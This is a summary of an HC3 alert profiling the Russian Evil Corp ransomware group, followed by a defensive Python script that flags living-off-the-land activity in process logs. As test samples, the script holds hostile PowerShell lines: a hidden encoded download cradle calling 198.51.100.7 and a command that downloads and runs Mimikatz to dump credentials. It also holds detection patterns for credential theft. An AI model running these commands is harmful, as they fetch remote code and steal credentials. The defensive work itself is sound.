The Health Sector Cybersecurity Coordination Center (HC3) is alerting the healthcare and public health (HPH) sector to one of the most capable and hostile cybercrime syndicates currently active: Evil Corp. The group operates from Russia, has been in business since around 2009, and is behind the well-known Dridex banking Trojan as well as a number of other malware and ransomware families, including Hades, BitPaymer, SocGholish, PhoenixLocker, WastedLocker, JabberZeus, and GameOver Zeus. Evil Corp's malware and ransomware have been used in numerous cyberattacks on the HPH sector; the best known is the 2017 BitPaymer ransomware attack on NHS Lanarkshire in Scotland.
In recent years Evil Corp's principal strategy has been digital extortion: deploying ransomware and stealing sensitive data. HC3 states that Evil Corp cooperates with the Russian intelligence services and may carry out attacks at the request of the Russian government. The group has access to a number of third-party malware families, such as the TrickBot and Emotet Trojans, and has ties to leading ransomware and cybercriminal operations around the world.
Evil Corp has been the target of several law enforcement actions. In 2019 a federal grand jury indicted the head of Evil Corp, Maksim Yakubets, on charges of computer hacking, conspiracy, bank fraud and wire fraud connected with the distribution of the Bugat malware, the forerunner of Dridex. Besides managing the operation, Yakubets is in contact with the Russian government and is known to have been tasked with projects for the Russian FSB. A number of other high-ranking group members have also been identified and are currently being sought by the FBI and other law enforcement agencies.
The group depends heavily on money mules to collect payments from its victims; around eight Moscow-based individuals are believed to have acted as the group's financial facilitators, laundering the proceeds of the attacks to keep law enforcement from tracing the money.
Because Evil Corp has a number of malware and ransomware families at its disposal, it uses a wide variety of tactics, techniques, and procedures during its attacks. It also has considerable technical capabilities, both in-house and through its connections with other cybercriminal operations. Phishing is one of the primary techniques used to obtain initial access to victim networks. The group is also known to use legitimate security tools and living-off-the-land techniques to evade security controls and operate undetected, including publicly available tools such as Covenant, Cobalt Strike, Donut, Mimikatz, Koadic, PowerSploit, and PowerShell Empire, together with many custom-developed tools.
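As an added example (not part of the HC3 alert or its threat profile), the following Python script shows the kind of heuristic triage a defender can run over process-creation telemetry to surface the living-off-the-land tradecraft described above: an Office application spawning a script host (the phishing-to-macro chain), PowerShell launched with an encoded command, a decoded payload carrying a download cradle, and Mimikatz or PowerSploit invocation strings. The event lines, file paths, script contents and the 198.51.100.7 address are constructed for this example and are not indicators published by HC3.

```python
"""Heuristic triage of process-creation events for living-off-the-land
post-exploitation patterns. Added example; all sample data is constructed."""
import base64
import binascii
import re

# Processes worth watching when launched by an Office application
# (phishing lure -> macro -> script host is a common initial-access chain).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Strings that recur in PowerSploit, Empire and Mimikatz tradecraft.
SCRIPT_MARKERS = {
    "download-cradle": re.compile(
        r"(?i)DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\bIEX\b|Invoke-Expression"),
    "in-memory-loader": re.compile(
        r"(?i)FromBase64String|Reflection\.Assembly|VirtualAlloc"),
    "mimikatz": re.compile(
        r"(?i)Invoke-Mimikatz|sekurlsa::|lsadump::|privilege::debug"),
}
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
EVASION_FLAGS = re.compile(
    r"(?i)(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?\b|noni(?:nteractive)?\b"
    r"|ep\s+bypass|executionpolicy\s+bypass)")
KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Parse a flattened 'Key=value Key="quoted value"' event line into a dict."""
    return {k: v.strip('"') for k, v in KV.findall(line)}


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def encode_powershell(script):
    """Produce the value PowerShell expects after -EncodedCommand (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(command_line):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(event):
    """Return the heuristic reasons this event looks like living-off-the-land
    post-exploitation; an empty list means nothing matched."""
    reasons = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append("office-spawned-script-host")
    if EVASION_FLAGS.search(cmd):
        reasons.append("evasion-flags")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded-command")
    # Inspect the decoded payload when there is one; operators hide cradles there.
    for name, rx in SCRIPT_MARKERS.items():
        if rx.search(decoded if decoded is not None else cmd):
            reasons.append(name)
    return reasons


def scan(lines, threshold=2):
    """Triage every line and report (line_number, reasons) for lines with at least
    `threshold` independent reasons, so a lone -NoProfile does not page anyone."""
    hits = []
    for n, line in enumerate(lines, 1):
        reasons = triage(parse_event(line))
        if len(reasons) >= threshold:
            hits.append((n, reasons))
    return hits


# Constructed sample events (Sysmon Event ID 1 fields, flattened). Paths, scripts
# and the 198.51.100.7 address (documentation range) are made up for this example.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')"
SAMPLE_EVENTS = [
    'Image=C:\\Windows\\System32\\svchost.exe ParentImage=C:\\Windows\\System32\\services.exe '
    'CommandLine="C:\\Windows\\System32\\svchost.exe -k netsvcs -p"',
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
    f'CommandLine="powershell.exe -NoP -W Hidden -Enc {encode_powershell(CRADLE)}"',
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'ParentImage=C:\\Windows\\System32\\cmd.exe '
    'CommandLine="powershell.exe -ExecutionPolicy Bypass -Command '
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/Invoke-Mimikatz.ps1'); "
    'Invoke-Mimikatz -DumpCreds"',
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'ParentImage=C:\\Windows\\explorer.exe '
    'CommandLine="powershell.exe -NoProfile -File C:\\scripts\\nightly-backup.ps1"',
]

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_EVENTS):
        print(f"event {n}: {', '.join(reasons)}")
```

The threshold in `scan` is the practical caveat: an administrator's `-NoProfile` backup job trips one heuristic on its own and is deliberately not reported, while the macro-spawned encoded cradle and the Mimikatz download trip several and are. Real deployments would pair this with the YARA rules and indicators HC3 publishes rather than rely on command-line strings alone.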
Because of the wide range of malware and ransomware families and custom tools used by the group, multiple protective measures and mitigations are needed to detect and block attacks. HC3 has listed a number of resources in its alert (https://www.hhs.gov/sites/default/files/evil-corp-threat-profile.pdf) to help network defenders strengthen their defenses, including YARA rules, indicators of compromise, and other defensive data.